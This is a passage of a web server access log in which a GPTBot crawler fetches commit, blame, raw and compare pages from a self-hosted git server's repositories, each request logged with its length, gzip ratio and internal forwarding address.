GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10223] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12629] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10690] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10332] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10720] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 25404] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:14:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9925] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" -[17/Feb/2026:14:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" -[17/Feb/2026:14:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12767] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:14:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13890] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:14:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12758] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:14:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12972] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:14:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 22977] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:14:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 22964] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:14:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets" [Client 74.7.227.38] [Length 28031] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 35320] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" -[17/Feb/2026:14:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" -[17/Feb/2026:14:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/releases.rss" [Client 74.7.227.38] [Length 354] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/releases" -[17/Feb/2026:14:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:14:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10166] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:14:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:14:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:14:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12487] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:14:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:14:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:14:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12799] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:14:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15114] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:14:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:14:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12504] [Gzip 7.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:14:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:14:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 558466] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" -[17/Feb/2026:14:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 626449] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 558067] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" -[17/Feb/2026:14:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10936] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10932] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:14:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10935] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10935] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10892] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 11815] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:14:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10515] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:14:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10515] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:14:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10289] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" -[17/Feb/2026:14:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10314] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" -[17/Feb/2026:14:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 10829] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:14:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10399] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" -[17/Feb/2026:14:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10486] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:14:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" [Client 74.7.227.38] [Length 10702] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 34453] [Gzip 14.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 